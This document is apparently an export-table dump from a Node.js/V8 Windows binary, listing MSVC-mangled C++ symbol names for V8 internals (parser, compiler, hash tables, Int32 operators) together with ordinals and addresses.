                                  ?IndexToEntry@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AVInternalIndex@23@H@Z72930x140423f70
                                  ?IndexToEntry@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AVInternalIndex@23@H@Z72940x14077aee0
                                  ?IndexToEntry@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@SA?AVInternalIndex@23@H@Z72950x140423f90
                                  ?IndexToEntry@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AVInternalIndex@23@H@Z72960x140423f40
                                  ?IndexToEntry@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AVInternalIndex@23@H@Z72970x140423f40
                                  ?IndexToEntry@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@SA?AVInternalIndex@23@H@Z72980x140423f90
                                  ?IndexToEntry@?$HashTable@VStringTable@internal@v8@@VStringTableShape@23@@internal@v8@@SA?AVInternalIndex@23@H@Z72990x140423f90
                                  ?IndexToSlice@ConstantArrayBuilder@interpreter@internal@v8@@AEBAPEAUConstantArraySlice@1234@_K@Z73000x14086e320
                                  ?IndirectLoadConstant@TurboAssemblerBase@internal@v8@@QEAAXVRegister@23@V?$Handle@VHeapObject@internal@v8@@@23@@Z73010x1409d7bb0
                                  ?IndirectLoadExternalReference@TurboAssemblerBase@internal@v8@@QEAAXVRegister@23@VExternalReference@23@@Z73020x1409d7cf0
                                  ?InductionVariablePhi@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z73030x140e0b020
                                  ?Infer@NativeContextInferrer@internal@v8@@QEAA_NPEAVIsolate@23@VMap@23@VHeapObject@23@PEA_K@Z73040x14090a5d0
                                  ?InferForJSFunction@NativeContextInferrer@internal@v8@@AEAA_NVJSFunction@23@PEA_K@Z73050x1408ed9f0
                                  ?InferForJSObject@NativeContextInferrer@internal@v8@@AEAA_NPEAVIsolate@23@VMap@23@VJSObject@23@PEA_K@Z73060x1408eda30
                                  ?InferFunctionName@Parser@internal@v8@@AEAAXXZ73070x1406fb2e0
                                  ?InferHasInPrototypeChain@JSNativeContextSpecialization@compiler@internal@v8@@AEAA?AW4InferHasInPrototypeChainResult@1234@PEAVNode@234@0AEBVHeapObjectRef@234@@Z73080x140f80510
                                  ?InferReceiverMaps@JSNativeContextSpecialization@compiler@internal@v8@@AEBA_NPEAVNode@234@0PEAV?$ZoneVector@V?$Handle@VMap@internal@v8@@@internal@v8@@@34@@Z73090x140f80980
                                  ?InferReceiverMapsUnsafe@NodeProperties@compiler@internal@v8@@SA?AW4InferReceiverMapsResult@1234@PEAVJSHeapBroker@234@PEAVNode@234@1PEAV?$ZoneHandleSet@VMap@internal@v8@@@34@@Z73100x140e44900
                                  ?InferReceiverRootMap@JSNativeContextSpecialization@compiler@internal@v8@@AEBA?AV?$Optional@VMapRef@compiler@internal@v8@@@base@4@PEAVNode@234@@Z73110x140f80b70
                                  ?InferScriptName@ProfilerListener@internal@v8@@AEAA?AVName@23@V423@VSharedFunctionInfo@23@@Z73120x1406d2ab0
                                  ?InferredFunctionName@ScopeInfo@internal@v8@@QEBA?AVObject@23@XZ73130x140759090
                                  ?Infinity_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ73140x140423fa0
                                  ?Infinity_string@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ73150x1407277a0
                                  ?Inherit@FunctionTemplate@v8@@QEAAXV?$Local@VFunctionTemplate@v8@@@2@@Z73160x140a91980
                                  ?Init@Isolate@internal@v8@@AEAA_NPEAVReadOnlyDeserializer@23@PEAVStartupDeserializer@23@@Z73170x14097eb00
                                  ?Init@Scanner@internal@v8@@AEAAXXZ73180x140423fb0
                                  ?Init@TickSample@internal@v8@@QEAAXPEAVIsolate@23@AEBURegisterState@3@W4RecordCEntryFrame@123@_N3VTimeDelta@base@3@@Z73190x1406cd1b0
                                  ?Init@node@@YAXPEAHPEAPEBD0PEAPEAPEBD@Z73200x1401e9270
                                  ?InitFrame@Thread@WasmInterpreter@wasm@internal@v8@@QEAAXPEBUWasmFunction@345@PEAVWasmValue@345@@Z73210x140557980
                                  ?InitReservation@IsolateAllocator@internal@v8@@AEAA_KXZ73220x14089bd60
                                  ?InitThread@Debug@internal@v8@@QEAAXAEBVExecutionAccess@23@@Z73230x140424040
                                  ?InitThread@StackGuard@internal@v8@@QEAAXAEBVExecutionAccess@23@@Z73240x14096d4f0
                                  ?InitWithSnapshot@Isolate@internal@v8@@QEAA_NPEAVReadOnlyDeserializer@23@PEAVStartupDeserializer@23@@Z73250x14097f7a0
                                  ?InitWithoutSnapshot@Isolate@internal@v8@@QEAA_NXZ73260x14097f7b0
                                  ?InitialMapInstanceSizeWithMinSlack@JSFunctionRef@compiler@internal@v8@@QEBAHXZ73270x140de4e90
                                  ?InitialTotalCapacity@NewSpace@internal@v8@@QEAA_KXZ73280x140424050
                                  ?Initialize@?$SmallOrderedHashTable@VSmallOrderedHashMap@internal@v8@@@internal@v8@@QEAAXPEAVIsolate@23@H@Z73290x14075fdf0
                                  ?Initialize@?$SmallOrderedHashTable@VSmallOrderedHashSet@internal@v8@@@internal@v8@@QEAAXPEAVIsolate@23@H@Z73300x14075fee0
                                  ?Initialize@?$SmallOrderedHashTable@VSmallOrderedNameDictionary@internal@v8@@@internal@v8@@QEAAXPEAVIsolate@23@H@Z73310x14075ffb0
                                  ?Initialize@BytecodeArrayRandomIterator@interpreter@internal@v8@@AEAAXXZ73320x14088a160
                                  ?Initialize@CallInterfaceDescriptor@internal@v8@@AEAAXPEAVCallInterfaceDescriptorData@23@@Z73330x14045c100
                                  ?Initialize@ConsStringIterator@internal@v8@@AEAAXVConsString@23@H@Z73340x1407491c0
                                  ?Initialize@Deserializer@internal@v8@@IEAAXPEAVIsolate@23@@Z73350x14060dea0
                                  ?Initialize@EhFrameWriter@internal@v8@@QEAAXXZ73360x1409a5e90
                                  ?Initialize@HandleScope@v8@@IEAAXPEAVIsolate@2@@Z73370x140a91b20
                                  ?Initialize@Isolate@v8@@SAXPEAV12@AEBUCreateParams@12@@Z73380x140a91bf0
                                  ?Initialize@JSArray@internal@v8@@SAXV?$Handle@VJSArray@internal@v8@@@23@HH@Z73390x14077b060
                                  ?Initialize@LayoutDescriptor@internal@v8@@CA?AV123@V123@VMap@23@VDescriptorArray@23@H@Z73400x140424060
                                  ?Initialize@Locker@v8@@AEAAXPEAVIsolate@2@@Z73410x14096bfc0
                                  ?Initialize@OS@base@v8@@SAX_NQEBD@Z73420x140dc0f00
                                  ?Initialize@Scanner@internal@v8@@QEAAXXZ73430x1406eaf70
                                  ?Initialize@SourcePositionTableIterator@internal@v8@@AEAAXXZ73440x1409d9370
                                  ?Initialize@StubCache@internal@v8@@QEAAXXZ73450x1408b4f20
                                  ?Initialize@TransitionsAccessor@internal@v8@@AEAAXXZ73460x1404241d0
                                  ?Initialize@Unlocker@v8@@AEAAXPEAVIsolate@2@@Z73470x14096c040
                                  ?Initialize@V8@v8@@CA_NH@Z73480x140a91ea0
                                  ?Initialize@V8@v8@@SA_NXZ73490x140076ea0
                                  ?InitializeAllocationMemento@Factory@internal@v8@@AEAAXVAllocationMemento@23@VAllocationSite@23@@Z73500x140946960
                                  ?InitializeAndStartSerializing@JSHeapBroker@compiler@internal@v8@@QEAAXV?$Handle@VNativeContext@internal@v8@@@34@@Z73510x140de4f80
                                  ?InitializeCallBuffer@InstructionSelector@compiler@internal@v8@@AEAAXPEAVNode@234@PEAUCallBuffer@234@V?$Flags@W4CallBufferFlag@InstructionSelector@compiler@internal@v8@@H@base@4@_NH@Z73520x140e37370
                                  ?InitializeCodeRanges@Isolate@internal@v8@@AEAAXXZ73530x14097f7c0
                                  ?InitializeContext@node@@YA_NV?$Local@VContext@v8@@@v8@@@Z73540x1402497c0
                                  ?InitializeCounters@Isolate@internal@v8@@QEAA_NXZ73550x14097f840
                                  ?InitializeDefaultEmbeddedBlob@Isolate@internal@v8@@AEAAXXZ73560x14097f9a0
                                  ?InitializeEffectControl@GraphAssembler@compiler@internal@v8@@QEAAXPEAVNode@234@0@Z73570x140ec54c0
                                  ?InitializeEmptyScopeChain@Parser@internal@v8@@QEAAXPEAVParseInfo@23@@Z73580x14072ffe0
                                  ?InitializeEntry@OSROptimizedCodeCache@internal@v8@@AEAAXHVSharedFunctionInfo@23@VCode@23@VBailoutId@23@@Z73590x14075bff0
                                  ?InitializeExternalStartupData@V8@v8@@SAXPEBD@Z73600x1406a57a0
                                  ?InitializeExternalStartupDataFromFile@V8@v8@@SAXPEBD@Z73610x1406a57a0
                                  ?InitializeICU@V8@v8@@SA_NPEBD@Z73620x140a91f10
                                  ?InitializeICUDefaultLocation@V8@v8@@SA_NPEBD0@Z73630x140a91f20
                                  ?InitializeJSObjectBody@Factory@internal@v8@@AEAAXV?$Handle@VJSObject@internal@v8@@@23@V?$Handle@VMap@internal@v8@@@23@H@Z73640x140946980
                                  ?InitializeJSObjectFromMap@Factory@internal@v8@@AEAAXV?$Handle@VJSObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@V?$Handle@VMap@internal@v8@@@23@@Z73650x140946af0
                                  ?InitializeLiveness@BytecodeLivenessMap@compiler@internal@v8@@QEAAAEAUBytecodeLiveness@234@HHPEAVZone@34@@Z73660x140e9f360
                                  ?InitializeLoggingAndCounters@Isolate@internal@v8@@QEAAXXZ73670x14097faa0
                                  ?InitializeMap@Factory@internal@v8@@QEAA?AVMap@23@V423@W4InstanceType@23@HW4ElementsKind@23@H@Z73680x140946bb0
                                  ?InitializeNodeWithArgs@node@@YAHPEAV?$vector@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@00@Z73690x1401e9da0
                                  ?InitializeObjectLiteral@Parser@internal@v8@@AEAAPEAVObjectLiteral@23@PEAV423@@Z73700x1406fb300
                                  ?InitializeOncePerProcess@CallDescriptors@internal@v8@@SAXXZ73710x1409de280
                                  ?InitializeOncePerProcess@Isolate@internal@v8@@SAXXZ73720x14097faf0
                                  ?InitializeOncePerProcess@WasmEngine@wasm@internal@v8@@SAXXZ73730x14055fe50
                                  ?InitializePage@PagedSpace@internal@v8@@QEAAPEAVPage@23@PEAVMemoryChunk@23@@Z73740x1408d3d10
                                  ?InitializePlacement@Scheduler@compiler@internal@v8@@AEAA?AW4Placement@1234@PEAVNode@234@@Z73750x140fb8ba0
                                  ?InitializePlatform@V8@v8@@SAXPEAVPlatform@2@@Z73760x140a91f30
                                  ?InitializePlatformIndependent@BigIntToI32PairDescriptor@internal@v8@@UEAAXPEAVCallInterfaceDescriptorData@23@@Z73770x14045c130
                                  ?InitializePlatformIndependent@BigIntToI64Descriptor@internal@v8@@UEAAXPEAVCallInterfaceDescriptorData@23@@Z73780x14045c190
                                  ?InitializePlatformIndependent@CallInterfaceDescriptor@internal@v8@@MEAAXPEAVCallInterfaceDescriptorData@23@@Z73790x14045c1d0
                                  ?InitializePlatformIndependent@CallInterfaceDescriptorData@internal@v8@@QEAAXV?$Flags@W4Flag@CallInterfaceDescriptorData@internal@v8@@H@base@3@HHPEBVMachineType@23@H@Z73800x1409e5fb0
                                  ?InitializePlatformIndependent@I32PairToBigIntDescriptor@internal@v8@@UEAAXPEAVCallInterfaceDescriptorData@23@@Z73810x14045c200
                                  ?InitializePlatformIndependent@I64ToBigIntDescriptor@internal@v8@@UEAAXPEAVCallInterfaceDescriptorData@23@@Z73820x14045c260
                                  ?InitializePlatformIndependent@InterpreterDispatchDescriptor@internal@v8@@UEAAXPEAVCallInterfaceDescriptorData@23@@Z73830x14045c2a0
                                  ?InitializePlatformIndependent@VoidDescriptor@internal@v8@@UEAAXPEAVCallInterfaceDescriptorData@23@@Z73840x14045c310
                                  ?InitializePlatformSpecific@BigIntToI32PairDescriptor@internal@v8@@MEAAXPEAVCallInterfaceDescriptorData@23@@Z73850x1405dc6c0
                                  ?InitializePlatformSpecific@BigIntToI64Descriptor@internal@v8@@MEAAXPEAVCallInterfaceDescriptorData@23@@Z73860x1405dc6c0
                                  ?InitializePlatformSpecific@CallInterfaceDescriptor@internal@v8@@MEAAXPEAVCallInterfaceDescriptorData@23@@Z73870x140422810
                                  ?InitializePlatformSpecific@CallInterfaceDescriptorData@internal@v8@@QEAAXHPEBVRegister@23@@Z73880x1409e71f0
                                  ?InitializePlatformSpecific@I32PairToBigIntDescriptor@internal@v8@@MEAAXPEAVCallInterfaceDescriptorData@23@@Z73890x1409e6e70
                                  ?InitializePlatformSpecific@I64ToBigIntDescriptor@internal@v8@@MEAAXPEAVCallInterfaceDescriptorData@23@@Z73900x1405dc6c0
                                  ?InitializePlatformSpecific@InterpreterDispatchDescriptor@internal@v8@@MEAAXPEAVCallInterfaceDescriptorData@23@@Z73910x14049ff80
                                  ?InitializePlatformSpecific@VoidDescriptor@internal@v8@@MEAAXPEAVCallInterfaceDescriptorData@23@@Z73920x1409e7150
                                  ?InitializeRootRegister@CallDescriptor@compiler@internal@v8@@QEBA_NXZ73930x14045c350
                                  ?InitializeRootRegister@TurboAssembler@internal@v8@@QEAAXXZ73940x1404361e0
                                  ?InitializeSpeculationPoison@CodeGenerator@compiler@internal@v8@@AEAAXXZ73950x140e4b300
                                  ?InitializeThreadLocal@Isolate@internal@v8@@QEAAXXZ73960x14097fb10
                                  ?InitializeThreadLocal@LiveEdit@internal@v8@@SAXPEAVDebug@23@@Z73970x1409baa40
                                  ?InitializeVariables@Parser@internal@v8@@AEAAXPEAV?$ScopedList@PEAVStatement@internal@v8@@PEAX@23@W4VariableKind@23@PEBUDeclaration@DeclarationParsingResult@?$ParserBase@VParser@internal@v8@@@23@@Z73980x140730020
                                  ?InlineApiCall@JSNativeContextSpecialization@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@000PEAPEAV5234@1AEBVSharedFunctionInfoRef@234@AEBVFunctionTemplateInfoRef@234@@Z73990x140f80c80
                                  ?InlinePropertyGetterCall@JSNativeContextSpecialization@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@00PEAPEAV5234@1PEAV?$ZoneVector@PEAVNode@compiler@internal@v8@@@34@AEBVPropertyAccessInfo@234@@Z74000x140f81140
                                  ?InlinePropertySetterCall@JSNativeContextSpecialization@compiler@internal@v8@@AEAAXPEAVNode@234@000PEAPEAV5234@1PEAV?$ZoneVector@PEAVNode@compiler@internal@v8@@@34@AEBVPropertyAccessInfo@234@@Z74010x140f813f0
                                  ?InobjectUnboxedField@LayoutDescriptor@internal@v8@@CA_NHVPropertyDetails@23@@Z74020x140424260
                                  ?InputAt@Instruction@compiler@internal@v8@@QEAAPEAVInstructionOperand@234@_K@Z74030x140453b40
                                  ?InputAt@Instruction@compiler@internal@v8@@QEBAPEBVInstructionOperand@234@_K@Z74040x140453b40
                                  ?InputAt@Node@compiler@internal@v8@@QEBAPEAV1234@H@Z74050x14045c360
                                  ?InputCount@CallDescriptor@compiler@internal@v8@@QEBA_KXZ74060x14045c3f0
                                  ?InputCount@Instruction@compiler@internal@v8@@QEBA_KXZ74070x140453b50
                                  ?InputCount@Node@compiler@internal@v8@@QEBAHXZ74080x14045c400
                                  ?InputQueueIndex@OptimizingCompileDispatcher@internal@v8@@AEAAHH@Z74090x1406223f0
                                  ?InputRpo@InstructionSequence@compiler@internal@v8@@QEAA?AVRpoNumber@234@PEAVInstruction@234@_K@Z74100x140e04ad0
                                  ?Insert@ConstantArrayBuilder@interpreter@internal@v8@@QEAA_KN@Z74110x14086e400
                                  ?Insert@ConstantArrayBuilder@interpreter@internal@v8@@QEAA_KPEBVAstRawString@34@@Z74120x14086e600
                                  ?Insert@ConstantArrayBuilder@interpreter@internal@v8@@QEAA_KPEBVScope@34@@Z74130x14086e730
                                  ?Insert@ConstantArrayBuilder@interpreter@internal@v8@@QEAA_KVAstBigInt@34@@Z74140x14086e860
                                  ?Insert@ConstantArrayBuilder@interpreter@internal@v8@@QEAA_KVSmi@34@@Z74150x14086e990
                                  ?Insert@TransitionsAccessor@internal@v8@@QEAAXV?$Handle@VName@internal@v8@@@23@V?$Handle@VMap@internal@v8@@@23@W4SimpleTransitionFlag@23@@Z74160x140743930
                                  ?Insert@TypedSlots@internal@v8@@QEAAXW4SlotType@23@I@Z74170x1408d85c0
                                  ?InsertAsyncIteratorSymbol@ConstantArrayBuilder@interpreter@internal@v8@@QEAA_KXZ74180x14086e9f0
                                  ?InsertBranch@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@0PEAVNode@234@00@Z74190x140e42bb0
                                  ?InsertChangeBitToTagged@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z74200x141001030
                                  ?InsertChangeFloat32ToFloat64@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z74210x141001080
                                  ?InsertChangeFloat64ToInt32@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z74220x1410010d0
                                  ?InsertChangeFloat64ToUint32@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z74230x141001120
                                  ?InsertChangeInt32ToFloat64@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z74240x141001170
                                  ?InsertChangeTaggedSignedToInt32@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z74250x1410011c0
                                  ?InsertChangeTaggedToFloat64@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z74260x141001210
                                  ?InsertChangeUint32ToFloat64@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z74270x141001260
                                  ?InsertCheckedFloat64ToInt32@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4CheckForMinusZeroMode@234@AEBUFeedbackSource@234@0@Z74280x1410012b0
                                  ?InsertClassFieldsSymbol@ConstantArrayBuilder@interpreter@internal@v8@@QEAA_KXZ74290x14086ea90
                                  ?InsertConversion@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@PEBVOperator@234@0@Z74300x141001300
                                  ?InsertDeferred@ConstantArrayBuilder@interpreter@internal@v8@@QEAA_KXZ74310x14086eb30
                                  ?InsertEmptyArrayBoilerplateDescription@ConstantArrayBuilder@interpreter@internal@v8@@QEAA_KXZ74320x14086ebc0
                                  ?InsertEmptyFixedArray@ConstantArrayBuilder@interpreter@internal@v8@@QEAA_KXZ74330x14086ec60
                                  ?InsertEmptyObjectBoilerplateDescription@ConstantArrayBuilder@interpreter@internal@v8@@QEAA_KXZ74340x14086ed00
                                  ?InsertHomeObjectSymbol@ConstantArrayBuilder@interpreter@internal@v8@@QEAA_KXZ74350x14086eda0
                                  ?InsertInput@Node@compiler@internal@v8@@QEAAXPEAVZone@34@HPEAV1234@@Z74360x140e31c10
                                  ?InsertInputs@Node@compiler@internal@v8@@QEAAXPEAVZone@34@HH@Z74370x140e31e10
                                  ?InsertInterpreterTrampolineSymbol@ConstantArrayBuilder@interpreter@internal@v8@@QEAA_KXZ74380x14086ee40
                                  ?InsertIteratorSymbol@ConstantArrayBuilder@interpreter@internal@v8@@QEAA_KXZ74390x14086eee0
                                  ?InsertJob@CompilerDispatcher@internal@v8@@AEAA?AV?$_Tree_const_iterator@V?$_Tree_val@U?$_Tree_simple_types@U?$pair@$$CB_KV?$unique_ptr@UJob@CompilerDispatcher@internal@v8@@U?$default_delete@UJob@CompilerDispatcher@internal@v8@@@std@@@std@@@std@@@std@@@std@@@std@@V?$unique_ptr@UJob@CompilerDispatcher@internal@v8@@U?$default_delete@UJob@CompilerDispatcher@internal@v8@@@std@@@5@@Z74400x1409d6620
                                  ?InsertJumpTable@ConstantArrayBuilder@interpreter@internal@v8@@QEAA_K_K@Z74410x14086ef80
                                  ?InsertKey@IdentityMapBase@internal@v8@@AEAAH_K@Z74420x1405f34e0
                                  ?InsertNaN@ConstantArrayBuilder@interpreter@internal@v8@@QEAA_KXZ74430x14086f020
                                  ?InsertShadowingVarBindingInitializers@Parser@internal@v8@@AEAAXPEAVBlock@23@@Z74440x140730100
                                  ?InsertSloppyBlockFunctionVarBindings@Parser@internal@v8@@AEAAXPEAVDeclarationScope@23@@Z74450x140730300
                                  ?InsertSwitch@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@0PEAVNode@234@PEAPEAV5234@_K@Z74460x140e42cf0
                                  ?InsertTruncateInt64ToInt32@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z74470x141001470
                                  ?InsertUnconditionalDeopt@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4DeoptimizeReason@34@@Z74480x1410014c0
                                  ?InsideBlock@CodeAssemblerState@compiler@internal@v8@@QEAA_NXZ74490x140e6eba0
                                  ?InsideBlock@RawMachineAssembler@compiler@internal@v8@@QEAA_NXZ74500x140ee24c0
                                  ?Install@WasmJs@internal@v8@@SAXPEAVIsolate@23@_N@Z74510x140534aa0
                                  ?InstallCoverageInfo@Debug@internal@v8@@QEAAXV?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VCoverageInfo@internal@v8@@@23@@Z74520x1409c1a00
                                  ?InstallDebugBreakTrampoline@Debug@internal@v8@@QEAAXXZ74530x1409c1ac0
                                  ?InstallDependency@DependentCode@internal@v8@@SAXPEAVIsolate@23@AEBVMaybeObjectHandle@23@V?$Handle@VHeapObject@internal@v8@@@23@W4DependencyGroup@123@@Z74540x140836ba0
                                  ?InstallOptimizedFunctions@OptimizingCompileDispatcher@internal@v8@@QEAAXXZ74550x1409d4950
                                  ?InstanceOf@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z74560x140eae980
                                  ?InstanceOf@Value@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VObject@v8@@@2@@Z74570x140a91f40
                                  ?InstanceTemplate@FunctionTemplate@v8@@QEAA?AV?$Local@VObjectTemplate@v8@@@2@XZ74580x140a921a0
                                  ?InstantiateModule@Module@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@P6A?AV?$MaybeLocal@VModule@v8@@@2@0V?$Local@VString@v8@@@2@V?$Local@VModule@v8@@@2@@Z@Z74590x140a92330
                                  ?InstructionAt@InstructionSequence@compiler@internal@v8@@QEBAPEAVInstruction@234@H@Z74600x140453b60
                                  ?InstructionBlockAt@InstructionSequence@compiler@internal@v8@@QEAAPEAVInstructionBlock@234@VRpoNumber@234@@Z74610x140453ba0
                                  ?InstructionBlockAt@InstructionSequence@compiler@internal@v8@@QEBAPEBVInstructionBlock@234@VRpoNumber@234@@Z74620x140453ba0
                                  ?InstructionBlockCount@InstructionSequence@compiler@internal@v8@@QEBAHXZ74630x140453bd0
                                  ?InstructionBlocksFor@InstructionSequence@compiler@internal@v8@@SAPEAV?$ZoneVector@PEAVInstructionBlock@compiler@internal@v8@@@34@PEAVZone@34@PEBVSchedule@234@@Z74640x140e04d90
                                  ?InstructionDecode@Disassembler@disasm@@QEAAHV?$Vector@D@internal@v8@@PEAE@Z74650x14044c7e0
                                  ?Instrumentation@ReasonEnum@Paused@API@Debugger@protocol@v8_inspector@@3PEBDEB74660x141cdcc60
                                  ?Int16Array@AsmType@wasm@internal@v8@@SAPEAV1234@XZ74670x140a63350
                                  ?Int16Array_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ74680x140424290
                                  ?Int16Array_string@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ74690x1407277b0
                                  ?Int32Abs@SimplifiedLowering@compiler@internal@v8@@AEAAPEAVNode@234@QEAV5234@@Z74700x140fd67a0
                                  ?Int32AbsWithOverflow@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@U?$PairT@UInt32T@internal@v8@@UBoolT@23@@internal@v8@@@34@V?$SloppyTNode@UInt32T@internal@v8@@@34@@Z74710x140e6ebb0
                                  ?Int32AbsWithOverflow@MachineOperatorBuilder@compiler@internal@v8@@QEAA?BVOptionalOperator@234@XZ74720x140e19500
                                  ?Int32AbsWithOverflow@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z74730x140e6ec10
                                  ?Int32Add@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UInt32T@internal@v8@@@34@V534@0@Z74740x1409e9c50
                                  ?Int32Add@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UWord32T@internal@v8@@@34@V?$SloppyTNode@UWord32T@internal@v8@@@34@0@Z74750x140e6ec60
                                  ?Int32Add@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z74760x140ec54d0
                                  ?Int32Add@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ74770x140e195e0
                                  ?Int32Add@MachineOperatorReducer@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@0@Z74780x140faa040
                                  ?Int32Add@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z74790x140e6ecd0
                                  ?Int32AddWithOverflow@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@U?$PairT@UInt32T@internal@v8@@UBoolT@23@@internal@v8@@@34@V?$SloppyTNode@UInt32T@internal@v8@@@34@0@Z74800x140e6ed30
                                  ?Int32AddWithOverflow@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z74810x140ec5580
                                  ?Int32AddWithOverflow@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ74820x140e196a0
                                  ?Int32AddWithOverflow@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z74830x140e6eda0
                                  ?Int32Array@AsmType@wasm@internal@v8@@SAPEAV1234@XZ74840x140a63360
                                  ?Int32Array_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ74850x1404242a0
                                  ?Int32Array_string@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ74860x1407277c0
                                  ?Int32Constant@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UInt32T@internal@v8@@@34@H@Z74870x140e6ee00
                                  ?Int32Constant@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z74880x140e0b110
                                  ?Int32Constant@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@H@Z74890x140ec5640
                                  ?Int32Constant@MachineGraph@compiler@internal@v8@@QEAAPEAVNode@234@H@Z74900x140ea6240
                                  ?Int32Constant@MachineOperatorReducer@compiler@internal@v8@@AEAAPEAVNode@234@H@Z74910x140e5ed50
                                  ?Int32Constant@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@H@Z74920x140e6ee30
                                  ?Int32Div@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UInt32T@internal@v8@@@34@V?$SloppyTNode@UInt32T@internal@v8@@@34@0@Z74930x140e6ee60
                                  ?Int32Div@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z74940x140ec5690
                                  ?Int32Div@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ74950x140e19760
                                  ?Int32Div@MachineOperatorReducer@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@H@Z74960x140faa0d0
                                  ?Int32Div@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z74970x140e6eed0
                                  ?Int32Div@SimplifiedLowering@compiler@internal@v8@@AEAAPEAVNode@234@QEAV5234@@Z74980x140fd68e0
                                  ?Int32DivIsSafe@MachineOperatorBuilder@compiler@internal@v8@@QEBA_NXZ74990x14045c420
                                  ?Int32FalseConstant@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@XZ75000x1409e9c80
                                  ?Int32GreaterThan@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@V?$SloppyTNode@UWord32T@internal@v8@@@34@0@Z75010x140e6ef30
                                  ?Int32GreaterThan@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75020x140e6efa0
                                  ?Int32GreaterThanOrEqual@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@V?$SloppyTNode@UWord32T@internal@v8@@@34@0@Z75030x140e6f000
                                  ?Int32GreaterThanOrEqual@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75040x140e6f070
                                  ?Int32LessThan@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@V?$SloppyTNode@UWord32T@internal@v8@@@34@0@Z75050x140e6f0d0
                                  ?Int32LessThan@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75060x140ec5750
                                  ?Int32LessThan@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75070x140e19820
                                  ?Int32LessThan@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75080x140e6f140
